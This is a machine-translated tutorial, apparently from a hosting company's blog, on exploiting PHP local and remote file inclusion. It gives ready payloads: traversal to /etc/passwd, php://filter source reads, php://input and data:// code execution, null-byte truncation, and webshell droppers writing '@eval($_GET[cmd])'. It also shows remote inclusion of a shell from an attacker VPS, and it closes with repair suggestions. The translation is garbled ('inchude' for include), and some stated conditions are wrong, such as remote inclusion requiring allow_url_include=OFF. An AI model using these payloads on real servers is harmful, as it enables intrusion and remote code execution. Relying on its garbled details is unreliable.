PHP The penetration test file contains vulnerabilities and methods of exploitation

This article introduces “PHP The penetration test file contains vulnerabilities and methods of exploitation ” Knowledge about , During the operation of the actual case , Many people will encounter such difficulties , Next, let Xiaobian lead you to learn how to deal with these situations ！ I hope you will read carefully , Be able to learn ！

What is a file containing vulnerability

File contains , When website developers develop websites , Often repeated code will be written in a separate file , In other files, you can use the functions contained in the file to refer to separate files . At present, many languages support files containing , for example php（inchude,require,inchude_once,require_once） etc. ,, That is, the include file contains the function , The goal is to reduce code duplication , Improve code optimization efficiency , Reduce the repeated use of functions .

The file contains the resulting vulnerability , Because these files contain functions , When we have certain authority （ Can be read ） When , We can use the file containing function to contain the files specified by our language , Or include local The server Documents in . In short , When php Language when importing files , The file name of the reference , User controllable , Because the file name passed in has not been validated , Or bypassed without filtering , So as to reference other documents , Resulting in malicious code injection

The file contains the classification of vulnerabilities

It can be roughly divided into ： Local file contains and remote file contains .

The remote file contains ： Opening conditions , stay php.ini Open... In the configuration file allow_url_fopen and allow_url_include, Included files are third-party files

The local file contains ： Is the file on the local server

Once remote inclusion can be enabled , Then the vulnerabilities contained remotely are more direct than those contained locally , The harm is even greater , You can include any file of any host at will .

The local file contains

seeing the name of a thing one thinks of its function , Reference local file , utilize inchude The containing function contains local （ The server ） file .

Loophole & utilize

Use conditions ( With PHP For example )

1.inchude, Equal functions are introduced through dynamic variables

2. Users can automatically control dynamic variables

What are dynamic variables ？

We can understand that , For example, a website http://127.0.0.1/inchude.php?in=../../../etc/passwd, So the ?in=../../../etc/passwd It is a variable that we can operate dynamically

Direct access to files

?xx=/etc/passwd     # Direct access passwd Sensitive document
?xx=../../../etc/passwd 

Use the protocol to read the source code

?xx=php://filter/read=convert.base64-encode/resource=xx.php    # So you can see php Source code of the document

truncation %00

Here, assume that the vulnerability code is

<?phpif(isset($_GET['shell'])){    include($_GET['shell'].".php");  // Include files with .php, And visit }else{    include(index.php); }?>

Suppose such a normal website , We upload a picture horse file as tpm.jpg, At this time, when we need to visit the image, the website will report an error , here url=http://127.0.0.1/index.php？shell=tpm.jpg.php, At this time, the file does not exist in the file , At this point we can be in .jpg Add %00 Cut off , It may be possible to bypass .

Conditions ：php.ini in magic_quotes_qpc=off also PHP edition < 5.3.4 The situation of .

Length truncation

Vulnerability code demonstration

<?php$file=$_GET['shell'];include($file.'.jpg');?>

Similar to the above principle , stay 1.txt Write in

When you know the other server , We can use parsing features that go beyond the server , Make a detour .

Conditions ：Windows The length is &lsquo;/.&rsquo; Longer than 256,Linux The length is &lsquo;/.&rsquo; Longer than 4096

PHP Pseudo protocol

file://

effect ：

Access local files , stay CTF Commonly used documents in include question types

Conditions ：

allow_url_fopen=off/on

allow_url_inchude=off/on

example ：

The absolute path and filename of the file
http://127.0.0.1/include.php?file=file://C:\phpStudy\PHPTutorial\WWW\phpinfo.txt
Relative path and file name of the file
http://127.0.0.1/include.php?file=./phpinfo.txt
Network path and file name
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

php://

effect ：

php:// Access the input / output stream （i/o）

Here are two common types ：

php://filter For reading source code

php://input Used to perform PHP Code

Conditions ：

allow_url_fopen=off/on

allow_url_inchude=off/on

example

php://filter/read=convert.base64-encode/resource=[ file name ]  //base64 Read the file source code

http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php

php://input + POST perform php Code

http://127.0.0.1/include.php?file=php://input[POST DATA part ] <?php phpinfo(); ?>

If you have certain write permission ,POST Write a word Trojan

<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

data://

Conditions ：

allow_url_fopen=on

allow_url_inchude=on

effect ：

stay PHP>=5.2.0 rise , have access to data:// Data wrapper , Transfer data in the corresponding format

It can be executed PHP Code

example

#1.data://text/plain,

http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

#2.data://text/plain;base64,

http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

phar://

phar:// Deal with the zip:// similar , Also accessible zip Format compressed package content

http://127.0.0.1/include.php?file=phar://C:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt

Use conditions PHP > 5.3

Want to use Phar Methods in class , Must be phar.readonly=on/off, utilize phar The agreement can be extended php Deserialization vulnerability attack surface

The remote file contains

Server pass PHP Function to include any file , Because the file to be included is not strictly filtered , So you can include a malicious file , So as to achieve the purpose of attack

Exploit

Conditions ：

allow_url_include = OFF

allow_url_fopen = OFF

Remote contains webshell

?xxx=http:// Of the attacker VPS/shell.txt
# Will be named in the website directory shell.php The Trojan horse

shell.txt The content is ：

<?php    fputs(fopen('./shell.php','w'),'<?php @eval($_POST[123]) ?>');?>

Code audit

The file contains the functions used

include()        // Use this function , The file is included only when the code executes this function , Warn only when an error occurs and continue .
inclue_once()    // The function is the same as the former , The difference is that when the same file is called repeatedly , The program calls only once .
 
require()        // Use this function , As long as the program executes , Call this function immediately when there is an error in the containing file , Will output an error message and immediately terminate the program .
require_once()    // The function is the same as the former , The difference is that when the same file is called repeatedly , The program calls only once .

The above functions are searched globally during code audit

If it is uploaded based on image , To search $_FILES Variable , because PHP The function of processing uploaded files , Basically all with $_FILES of .

Look at the directory structure , Focus on includes、modules Etc , see index.php Whether the file has dynamically called these contents , Is the variable controllable .

Repair suggestions

• Prohibit remote files from containing allow_url_include=off

• To configure open_basedir= Specify the directory , Restricted access area .

• Filter ../ Equal special symbol

• modify Apache The storage address of the log file

• Open magic quotes magic_quotes_qpc=on

• Try not to use dynamic variables to call files , Write directly to the file to be included .

“PHP The penetration test file contains vulnerabilities and methods of exploitation ” That's all for , Thanks for reading . If you want to know more about the industry, you can pay attention to Yisu cloud website , Xiaobian will output more high-quality practical articles for you ！